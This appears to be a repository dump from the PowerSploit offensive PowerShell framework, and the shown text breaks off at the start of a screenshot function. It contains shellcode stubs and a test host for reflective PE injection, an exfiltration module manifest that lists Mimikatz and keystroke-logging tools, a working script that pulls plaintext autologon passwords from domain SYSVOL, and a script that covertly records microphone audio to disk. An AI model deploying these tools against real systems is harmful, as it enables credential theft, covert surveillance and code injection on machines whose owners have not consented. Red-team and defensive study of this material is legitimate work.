15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
int _tmain(int argc, _TCHAR* argv[])
{
    // Minimal host process for injection tests: it only has to stay alive
    // until Enter is pressed, giving the injector a stable target PID.
    // argc/argv are intentionally unused.
    puts("Press enter to close.");
    (void)getchar();

    return 0;
}
16 |
17 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}
15 | Win32Proj
16 | ExeToInjectInTo
17 |
18 |
19 |
20 | Application
21 | true
22 | v110
23 | Unicode
24 |
25 |
26 | Application
27 | false
28 | v110
29 | true
30 | Unicode
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | true
44 |
45 |
46 | false
47 |
48 |
49 |
50 | Use
51 | Level3
52 | Disabled
53 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
54 | true
55 |
56 |
57 | Console
58 | true
59 |
60 |
61 |
62 |
63 | Level3
64 | Use
65 | MaxSpeed
66 | true
67 | true
68 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
69 | true
70 |
71 |
72 | Console
73 | true
74 | true
75 | true
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 | Create
89 | Create
90 |
91 |
92 |
93 |
94 |
95 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ExeToInjectInTo application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ExeToInjectInTo application.
9 |
10 |
11 | ExeToInjectInTo.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ExeToInjectInTo.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ExeToInjectInTo.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ExeToInjectInTo.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt:
--------------------------------------------------------------------------------
This directory contains the NASM assembly used to build the shellcode that the PowerShell script embeds. Some of the assembly is not included because it was not saved; the missing pieces should only be the trivial stubs, such as moving an address into EAX and returning. The 0x4141414141414141 immediates in these listings are placeholders that the PowerShell script overwrites (presumably at fixed byte offsets), so any change to an instruction sequence moves them and the script's byte array must be regenerated from the new objdump output.
2 |
3 | Compile:
4 | x64:
5 | nasm -f elf64 FileName.asm
6 | ld -o FileName FileName.o
7 | objdump -M intel -d FileName
8 |
9 | x86:
nasm -f elf32 FileName.asm
ld -m elf_i386 -o FileName FileName.o
(nasm's default output format is a flat binary with no .o file, so -f elf32 is required for the ld step; -m elf_i386 is needed when linking on a 64-bit host.)
12 | objdump -M intel -d FileName
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
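[SECTION .text]
global _start

; Thunk that calls a reflectively loaded DLL's DllMain with
; (hModule, DLL_PROCESS_ATTACH, NULL) under the Win64 calling convention.
; The 0x4141414141414141 immediates are placeholders the PowerShell script
; overwrites. NOTE: the shadow-space reservation added below is 4 bytes
; long and shifts every placeholder offset by 4, so the byte array in the
; PowerShell script must be regenerated from this listing.
_start:
    ; Save rbx (callee-saved) and remember the caller's rsp so the exact
    ; stack state can be restored after the call.
    push rbx
    mov rbx, rsp

    ; Win64 ABI: the caller must reserve 32 bytes of "home"/shadow space
    ; directly above the return address for the four register arguments.
    ; The original code only aligned rsp, so whenever rsp was already
    ; 256-byte aligned (or within 24 bytes of it) nothing was reserved and
    ; DllMain's argument spills -- which MSVC debug builds always emit --
    ; landed on the saved rbx and on this thunk's own return address.
    ; Reserve first, then align, so at least 32 bytes always sit between
    ; the callee's home space and the saved rbx (matches GetFuncAddress
    ; and LoadLibraryA).
    sub rsp, 0x20
    and sp, 0xff00              ; 256-byte alignment; after the call pushes, callee sees rsp == 8 mod 16

    ; Call DllMain(hModule, DLL_PROCESS_ATTACH, NULL)
    mov rcx, 0x4141414141414141 ; hModule, patched in by the PowerShell script
    mov rdx, 0x1                ; DLL_PROCESS_ATTACH
    mov r8, 0x0                 ; lpReserved = NULL
    mov rax, 0x4141414141414141 ; address of DllMain, patched in by the PowerShell script
    call rax

    ; Restore the caller's stack and rbx; DllMain's BOOL result is left in rax.
    mov rsp, rbx
    pop rbx
    ret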
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
[SECTION .text]

global _start

; Stub that ends the injected EXE's thread instead of the whole process:
; it raises a flag byte for the PowerShell script, then calls ExitThread.
; Presumably patched in place of ExitProcess (per the original comments).
; Never returns. The 0x4141414141414141 immediates are placeholders the
; PowerShell script overwrites; do not reorder or resize the instructions
; without regenerating the byte array it patches.
_start:
    ; Set a byte flag to 1 so PS knows the exe is exiting
    mov rbx, 0x4141414141414141   ; address of the flag byte, patched in by PS (must be writable)
    mov [rbx], byte 0x01

    ; Call ExitThread instead of ExitProcess.
    ; 0xc0 bytes leaves room well beyond the 32-byte Win64 shadow space; the
    ; AND then rounds rsp down to 16 so the callee sees rsp == 8 mod 16
    ; once the call has pushed its return address.
    sub rsp, 0xc0
    and sp, 0xFFf0 ; Needed for stack alignment
    ; NOTE(review): rcx (ExitThread's dwExitCode) is not set here; whatever
    ; the intercepted caller left in rcx -- presumably ExitProcess's
    ; uExitCode -- is passed through. Confirm this is intended.
    ; rbx is clobbered without being saved, which is only acceptable
    ; because this code never returns.
    mov rbx, 0x4141414141414141   ; address of ExitThread, patched in by PS
    call rbx
15 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
[SECTION .text]

global _start

; Resolves an export with GetProcAddress inside the target process and stores
; the result where the PowerShell script can read it back. The four 0x41..
; immediates are placeholders patched by the script.
_start:
; Save state of rbx and stack
push rbx
mov rbx, rsp

; Set up stack for function call to GetProcAddress
sub rsp, 0x20                    ; Win64 shadow space for the callee
and sp, 0xffc0                   ; then align rsp downward

; Call getprocaddress - Win64 args: rcx = module handle, rdx = name pointer
mov rcx, 0x4141414141414141 ; DllHandle, set by PS
mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS
mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
call rax

; Store the result (rax) in the script-provided buffer
mov rcx, 0x4141414141414141 ; Ptr to buffer to save result, set by PS
mov [rcx], rax

; Restore stack
mov rsp, rbx
pop rbx
ret

--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
[SECTION .text]

global _start

; Loads a library inside the target process by calling LoadLibraryA and stores
; the returned module handle in a script-provided buffer. The three 0x41..
; immediates are placeholders patched by the script.
_start:
; Save rsp and setup stack for function call
push rbx
mov rbx, rsp
sub rsp, 0x20                    ; Win64 shadow space for the callee
and sp, 0xffc0                   ; then align rsp downward

; Call LoadLibraryA - Win64: rcx = pointer to the library name
mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS
mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
call rdx

; Save the handle (rax) for the script
mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
mov [rdx], rax

; Fix stack
mov rsp, rbx
pop rbx
ret

--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
[SECTION .text]
global _start

; 32-bit counterpart of the x64 stub: calls DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL)
; with stdcall argument passing. The 0x41414141 immediates are placeholders
; patched by the PowerShell script before injection.
_start:
; Get stack setup
push ebx                         ; ebx keeps the entry esp
mov ebx, esp
and esp, 0xfffffff0              ; 16-byte align

; Call DllMain - stdcall: arguments pushed right to left (lpvReserved, fdwReason, hinstDLL)
mov ecx, 0x41414141 ; DLLHandle, set by PowerShell
mov edx, 0x1 ; PROCESS_ATTACH
mov eax, 0x0 ; NULL
push eax
push edx
push ecx
mov eax, 0x41414141 ; Address of DllMain, set by PS
call eax

; Fix stack (restoring esp from ebx also discards the pushed arguments)
mov esp, ebx
pop ebx
ret

--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
[SECTION .text]
global _start

; 32-bit counterpart of the x64 stub: flag completion to the PowerShell side,
; then call a thread-exit routine instead of ending the process. Both
; 0x41414141 immediates are placeholders patched by the script.
_start:
; Set a var to 1, let PS know the EXE is exiting
mov ebx, 0x41414141              ; address of the flag byte, set by PS
mov [ebx], byte 0x01

; Call exitthread instead of exit process
sub esp, 0x20
and esp, 0xFFFFFFc0 ; Needed for stack alignment
mov ebx, 0x41414141              ; address of the exit routine, set by PS
call ebx                         ; not expected to return, hence no ret

--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm:
--------------------------------------------------------------------------------
[SECTION .text]

global _start

; 32-bit counterpart of x64/GetFuncAddress.asm: resolves an export with
; GetProcAddress (stdcall) and stores the result in a script-provided buffer.
; The four 0x41414141 immediates are placeholders patched by the script.
_start:
; Save state of ebx and stack
push ebx
mov ebx, esp

; Align stack
and esp, 0xffffffc0

; Call GetProcAddress - stdcall: push lpProcName first, then hModule
mov eax, 0x41414141 ; DllHandle, supplied by PS
mov ecx, 0x41414141 ; Function name, supplied by PS
push ecx
push eax
mov eax, 0x41414141 ; GetProcAddress address, supplied by PS
call eax

; Write GetProcAddress return value to an address supplied by PS
mov ecx, 0x41414141 ; Address supplied by PS
mov [ecx], eax

; Fix stack (esp from ebx discards the arguments regardless of callee cleanup)
mov esp, ebx
pop ebx
ret

--------------------------------------------------------------------------------
/CodeExecution/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module CodeExecution`
7 |
8 | To see the commands imported, type `Get-Command -Module CodeExecution`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psd1:
--------------------------------------------------------------------------------
@{

# Script module or binary module file associated with this manifest.
# (The .psm1 dot-sources every *.ps1 found next to it.)
ModuleToProcess = 'Exfiltration.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'

# Author of this module
Author = 'Matthew Graeber'

# Copyright statement for this module (holds the license name rather than a copyright line)
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Exfiltration Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Format files (.ps1xml) to be loaded when importing this module
FormatsToProcess = 'Get-VaultCredential.ps1xml'

# Functions to export from this module
# Wildcard: every function defined by the dot-sourced scripts becomes public,
# helpers included. An explicit list would make the exported surface reviewable.
FunctionsToExport = '*'

# List of all files packaged with this module
# Other files in this directory (e.g. the LogonUser sources) are not part of the module.
FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
           'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
           'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
           'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',
           'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'

}
38 |
--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psm1:
--------------------------------------------------------------------------------
# Module loader: dot-source every *.ps1 that sits next to this file so the
# functions they define become module members (exported per the manifest).
# Note for reviewers: any .ps1 placed in this directory runs on Import-Module.
Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1') |
    ForEach-Object { . $_.FullName }

--------------------------------------------------------------------------------
/Exfiltration/Get-GPPAutologon.ps1:
--------------------------------------------------------------------------------
function Get-GPPAutologon
{
<#
.SYNOPSIS

Retrieves passwords from Autologon entries that are pushed through Group Policy Registry Preferences.

PowerSploit Function: Get-GPPAutologon
Author: Oddvar Moe (@oddvarmoe)
Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Get-GPPAutologon searches the domain controller for registry.xml to find autologon information and returns the username and password.

Every Registry.xml under \\<domain>\SYSVOL is parsed. When a file contains both a
DefaultPassword and a DefaultUserName preference item, their values are collected
into one output object per file (Passwords, UserNames, File); a missing field is
reported as '[BLANK]'. Requires a domain-joined machine and a domain account.

Defensive note: these values sit in SYSVOL in plaintext, readable by every domain
member. Audit Registry.xml preference items that set a Winlogon DefaultPassword and
remove them; the same search this function performs locates them.

.EXAMPLE

PS C:\> Get-GPPAutologon

UserNames File Passwords
--------- ---- ---------
{administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
{NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}


.EXAMPLE

PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq

password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!

.LINK

https://support.microsoft.com/nb-no/kb/324737
#>

    [CmdletBinding()]
    Param ()

    #Some XML issues between versions
    Set-StrictMode -Version 2

    #define helper function to parse fields from xml files
    # Parses one Registry.xml and emits a PSObject (Passwords, UserNames, File)
    # when the file mentions both fields; emits nothing otherwise. Any error is
    # written to the error stream so the outer loop continues with the next file.
    function Get-GPPInnerFields
    {
        [CmdletBinding()]
        Param (
            $File
        )

        try
        {
            $Filename = Split-Path $File -Leaf   # not used below
            [xml] $Xml = Get-Content ($File)

            #declare empty arrays
            $Password = @()
            $UserName = @()

            #check for password and username field (cheap text test before walking the DOM)
            if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
            {
                $props = $xml.GetElementsByTagName("Properties")
                foreach($prop in $props)
                {
                    # 'name' is the registry value the preference item writes; switch
                    # compares case-insensitively, so 'DefaultUsername' matches DefaultUserName.
                    switch ($prop.name)
                    {
                        'DefaultPassword'
                        {
                            # The unary comma wraps $prop in an array so the pipeline hands the
                            # element through intact; its Value is then appended.
                            $Password += , $prop | Select-Object -ExpandProperty Value
                        }

                        'DefaultUsername'
                        {
                            $Username += , $prop | Select-Object -ExpandProperty Value
                        }
                    }

                    Write-Verbose "Potential password in $File"
                }

                #put [BLANK] in variables
                if (!($Password))
                {
                    $Password = '[BLANK]'
                }

                if (!($UserName))
                {
                    $UserName = '[BLANK]'
                }

                #Create custom object to output results
                $ObjectProperties = @{'Passwords' = $Password;
                                      'UserNames' = $UserName;
                                      'File' = $File}

                $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
                Write-Verbose "The password is between {} and may be more than one value."
                if ($ResultsObject)
                {
                    Return $ResultsObject
                }
            }
        }
        catch {Write-Error $Error[0]}
    }

    try {
        #ensure that machine is domain joined and script is running as a domain account
        if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
            throw 'Machine is not a domain member or User is not a member of the domain.'
        }

        #discover potential registry.xml containing autologon passwords
        # Recursive walk of the entire SYSVOL share, filtered on file name. A full
        # SYSVOL walk from a workstation is visible in share/object access auditing.
        Write-Verbose 'Searching the DC. This could take a while.'
        $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'

        if ( -not $XMlFiles ) {throw 'No preference files found.'}

        Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."

        # One object per file that yielded both fields; files without them emit nothing.
        foreach ($File in $XMLFiles) {
            $Result = (Get-GppInnerFields $File.Fullname)
            Write-Output $Result
        }
    }

    catch {Write-Error $Error[0]}
}
--------------------------------------------------------------------------------
/Exfiltration/Get-MicrophoneAudio.ps1:
--------------------------------------------------------------------------------
function Get-MicrophoneAudio {
<#
.SYNOPSIS
Records audio from the microphone and saves to a file on disk
Author: Justin Warner (@sixdub)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

All credit for PowerSploit functions belongs to the original author and project contributors. Thanks for the awesomeness! See here for more info:
http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
https://github.com/PowerShellMafia/PowerSploit

Thanks to Ed Wilson (Scripting Guy) for the one liner to generate random chars. https://blogs.technet.microsoft.com/heyscriptingguy/2015/11/05/generate-random-letters-with-powershell/

.DESCRIPTION
Get-MicrophoneAudio utilizes the Windows API from winmm.dll to record audio from the microphone and saves the wave file to disk.

No P/Invoke type is compiled: winmm.dll is loaded through a LoadLibraryA delegate,
its exports are resolved through a GetProcAddress delegate, and the MCI command
strings "open", "record", "save" and "close" drive the recording. The call blocks
for -Length seconds while recording.

Defensive note: a PowerShell process that loads winmm.dll and issues MCI command
strings, with no GUI involved, is an uncommon combination worth alerting on.

.OUTPUTS
Outputs the FileInfo object pointing to the recording which has been saved to disk.

.PARAMETER Path
The location to save the audio. The parent directory must already exist.

.PARAMETER Length
The length of the audio to record in seconds. Default: 30

.PARAMETER Alias
The alias to use for the WinMM recording. Default: Random 10 Chars

.EXAMPLE
Get-MicrophoneAudio -Path c:\windows\temp\secret.wav -Length 10 -Alias "SECRET"
Description
-----------
Records 10 seconds of audio to the path C:\windows\temp\secret.wav using WinMM alias "secret"
#>
    [OutputType([System.IO.FileInfo])]
    Param
    (
        [Parameter( Position = 0, Mandatory = $True)]
        [ValidateScript({Split-Path $_ | Test-Path})]
        [String] $Path,
        [Parameter( Position = 1, Mandatory = $False)]
        [Int] $Length = 30,
        [Parameter( Position = 2, Mandatory = $False)]
        [String] $Alias = $(-join ((65..90) + (97..122) | Get-Random -Count 10 | % {[char]$_}))

    )

    #Get-DelegateType from PowerSploit
    # Emits a delegate type with the given parameter/return types, built with
    # Reflection.Emit in an in-memory dynamic assembly, so that a raw function
    # pointer can be wrapped by Marshal::GetDelegateForFunctionPointer.
    function Local:Get-DelegateType
    {
        Param
        (
            [OutputType([Type])]

            [Parameter( Position = 0)]
            [Type[]]
            $Parameters = (New-Object Type[](0)),

            [Parameter( Position = 1 )]
            [Type]
            $ReturnType = [Void]
        )

        $Domain = [AppDomain]::CurrentDomain
        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
        $MethodBuilder.SetImplementationFlags('Runtime, Managed')

        Write-Output $TypeBuilder.CreateType()
    }

    #Get-ProcAddress from PowerSploit
    # Resolves an export address without Add-Type by borrowing the internal
    # GetModuleHandle/GetProcAddress wrappers from System.dll's
    # Microsoft.Win32.UnsafeNativeMethods. The module must already be loaded in
    # this process (GetModuleHandle does not load it).
    function local:Get-ProcAddress
    {
        Param
        (
            [OutputType([IntPtr])]

            [Parameter( Position = 0, Mandatory = $True )]
            [String]
            $Module,

            [Parameter( Position = 1, Mandatory = $True )]
            [String]
            $Procedure
        )

        # Get a reference to System.dll in the GAC
        $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
        # Get a reference to the GetModuleHandle and GetProcAddress methods
        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
        # Get a handle to the module specified (the variable name is historical; any module works)
        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
        $tmpPtr = New-Object IntPtr
        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)

        # Return the address of the function
        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
    }

    #Initialize and call LoadLibrary on our required DLL
    $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
    $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
    $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
    $HND = $null
    $HND = $LoadLibrary.Invoke('winmm.dll')
    # NOTE(review): the delegate is declared to return [IntPtr]; a failed load presumably
    # yields IntPtr.Zero, which is not $null, so this check is not expected to fire.
    if ($HND -eq $null)
    {
        Throw 'Failed to aquire handle to winmm.dll'
    }

    #Initialize the function call to count devices
    $waveInGetNumDevsAddr = $null
    $waveInGetNumDevsAddr = Get-ProcAddress winmm.dll waveInGetNumDevs
    $waveInGetNumDevsDelegate = Get-DelegateType @() ([Uint32])
    # NOTE(review): same remark as for $HND - Get-ProcAddress outputs an IntPtr, never $null.
    if ($waveInGetNumDevsAddr -eq $null)
    {
        Throw 'Failed to aquire address to WaveInGetNumDevs'
    }
    $waveInGetNumDevs = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($waveInGetNumDevsAddr, $waveInGetNumDevsDelegate)

    #Initilize the function call to record audio
    # mciSendStringA(lpszCommand, lpszReturnString, cchReturn, hwndCallback) -> MCIERROR
    $mciSendStringAddr = $null
    $mciSendStringAddr = Get-ProcAddress winmm.dll mciSendStringA
    $mciSendStringDelegate = Get-DelegateType @([String],[String],[UInt32],[IntPtr]) ([Uint32])
    if ($mciSendStringAddr -eq $null)
    {
        Throw 'Failed to aquire address to mciSendStringA'
    }
    $mciSendString = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mciSendStringAddr, $mciSendStringDelegate)

    #Initialize the ability to resolve MCI Errors
    # mciGetErrorStringA(error code, text buffer, buffer length) -> BOOL
    $mciGetErrorStringAddr = $null
    $mciGetErrorStringAddr = Get-ProcAddress winmm.dll mciGetErrorStringA
    $mciGetErrorStringDelegate = Get-DelegateType @([UInt32],[Text.StringBuilder],[UInt32]) ([bool])
    if ($mciGetErrorStringAddr -eq $null)
    {
        Throw 'Failed to aquire address to mciGetErrorString'
    }
    $mciGetErrorString = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mciGetErrorStringAddr,$mciGetErrorStringDelegate)

    #Get device count
    $DeviceCount = $waveInGetNumDevs.Invoke()

    if ($DeviceCount -gt 0)
    {

        #Define buffer for MCI errors. https://msdn.microsoft.com/en-us/library/windows/desktop/dd757153(v=vs.85).aspx
        # 150 is also the length passed to mciGetErrorString on every failure path below.
        $errmsg = New-Object Text.StringBuilder 150

        #Open an alias
        # Each MCI command returns 0 on success; otherwise the error text is looked up and thrown.
        $rtnVal = $mciSendString.Invoke("open new Type waveaudio Alias $alias",'',0,0)
        if ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw "MCI Error ($rtnVal): $msg"}

        #Call recording function
        $rtnVal = $mciSendString.Invoke("record $alias", '', 0, 0)
        if ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw "MCI Error ($rtnVal): $msg"}

        # Recording continues in the background while this thread sleeps.
        Start-Sleep -s $Length

        #save recorded audio to disk
        $rtnVal = $mciSendString.Invoke("save $alias `"$path`"", '', 0, 0)
        if ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw "MCI Error ($rtnVal): $msg"}

        #terminate alias
        # If an earlier step throws, the alias is left open; nothing below runs in that case.
        $rtnVal = $mciSendString.Invoke("close $alias", '', 0, 0);
        if ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw "MCI Error ($rtnVal): $msg"}

        $OutFile = Get-ChildItem -path $path
        Write-Output $OutFile

    }
    else
    {
        Throw 'Failed to enumerate any recording devices'
    }
}
188 |
--------------------------------------------------------------------------------
/Exfiltration/Get-TimedScreenshot.ps1:
--------------------------------------------------------------------------------
function Get-TimedScreenshot
{
<#
.SYNOPSIS

Takes screenshots at a regular interval and saves them to disk.

PowerSploit Function: Get-TimedScreenshot
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
